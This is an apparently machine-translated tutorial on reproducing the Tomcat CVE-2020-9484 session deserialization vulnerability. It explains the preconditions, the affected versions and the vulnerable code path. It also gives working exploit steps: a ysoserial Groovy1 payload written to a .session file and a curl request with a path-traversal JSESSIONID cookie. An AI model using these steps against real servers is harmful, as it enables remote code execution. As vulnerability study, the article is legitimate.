Shulou(Shulou.com)05/31 Report--

This article shows you how to reproduce Tomcat Session deserialization vulnerabilities, which is concise and easy to understand, which will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Introduction to 0x01

Apache Tomcat, which was originally developed by Sun Microsystems as a Servlet container, was donated to ASF (Apache Software Foundation) in 1999, belongs to the Jakarta project, and is now an independent top-level project. Tomcat mainly implements the Servlet and JSP specifications in Java EE, and also provides HTTP services. It is a very popular Java Web container in the market.

Tomcat server is a free and open source Web application server, which is a lightweight application server. It is widely used in small and medium-sized systems and not many concurrent access users. It is the first choice for developing and debugging JSP programs. For a beginner, it can be thought that when an Apache server is configured on a machine, it can be used to respond to requests for access to HTML (an application under the standard general markup language) pages. Tomcat is actually an extension of the Apache server, but at run time it runs independently, so when you run tomcat, it actually runs as a separate process from Apache.

Introduction of 0x02 vulnerabilities

Beijing time, May 20, 2020, Apache officially issued a risk notice for Apache Tomcat remote code execution, the vulnerability number is CVE-2020-9484.

Apache Tomcat is an open source Java-based Web application container that runs servlet and JSP Web applications. When Tomcat uses the native session synchronization feature, there is a deserialization vulnerability when using an insecure configuration (without using EncryptInterceptor). Through carefully constructed packets, attackers can attack Tomcat servers that use the native session synchronization feature.

Successful exploitation requires the following four conditions to be met at the same time:

1. Attackers can control the contents and names of files on the server

two。 FileStore is used in the server PersistenceManager configuration

The sessionAttributeValueClassNameFilter in 3.PersistenceManager is configured as "null" or the filter is not strict enough to allow an attacker to provide an object that deserializes data

4. The attacker knows the relative path from the FileStore storage location used to the files that the attacker can control.

0x03 affects version

Apache Tomcat 10.0.0-M1-10.0.0-M4

Apache Tomcat 9.0.0.M1-9.0.34

Apache Tomcat 8.5.0-8.5.54

Apache Tomcat 7.0.0-7.0.103

0x04 vulnerability analysis

According to the above configuration

To find the tomcat source code Tomcat 10.0.0-M4 is used here for analysis.

Check the load method of FileStore. The code is as follows

Load first converts session id to file object to see if the file exists and, if so, reads the file. File object adds the suffix ".session" to the entered id, but there is no directory to validate the file.

When the file exists, the system will run

The getObjectInputStream method runs org.apache.catalina.util.CustomObjectInputStream to get the gadget class, and then deserializes the session file.

0x05 environment building

Installation of tomcat requires java8 environment, Java8 environment installation tutorial

Https://www.jianshu.com/p/9ec7838411c8

Set up a tomcat service and download tomcat 10.0.0-M4 at the following address:

Https://repo1.maven.org/maven2/org/apache/tomcat/tomcat/10.0.0-M4/tomcat-10.0.0-M4.tar.gz

Create a tomcat directory under / usr/local/ and extract the files into it

Mkdir / usr/local/tomcattar-zxvf tomcat-10.0.0-M4.tar.gz-C / usr/local/tomcat/

Modify / usr/local/tomcat/conf/context.xlm to add Manager

Download groovy-2.3.9.jar and put groovy-2.3.9.jar in the / usr/local/tomcat/lib directory

Execute under lib: wget https://repo1.maven.org/maven2/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar

Run tomcat:/usr/local/tomcat/bin/catalina.sh start

When the browser accesses http://ip:8080, the following interface indicates that the installation is successful

Recurrence of 0x06 vulnerabilities

Download ysoserial a .jar package that generates java deserialization payload

Download address: git clone https://github.com/frohoff/ysoserial.git

Execute the following statement to generate payload

Java-jar ysoserial-master-30099844c6-1.jar Groovy1 "touch / tmp/2333" > / tmp/test.session

Add Cookie: JSESSIONID=../tmp/test to the package that crawls the home page in the browser

Or execute POC directly in the environment and load malicious session persistence files through JSESSION

Curl 'http://172.16.1.186:8080/index.jsp'-H' Cookie: JSESSIONID=../tmp/test'

Execute ls / tmp to view the results

0x07 repair mode

Upgrade the version, or configure WAF, filter out strings like.. /, or don't use FileStore.

The above content is how to reproduce Tomcat Session deserialization vulnerabilities. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.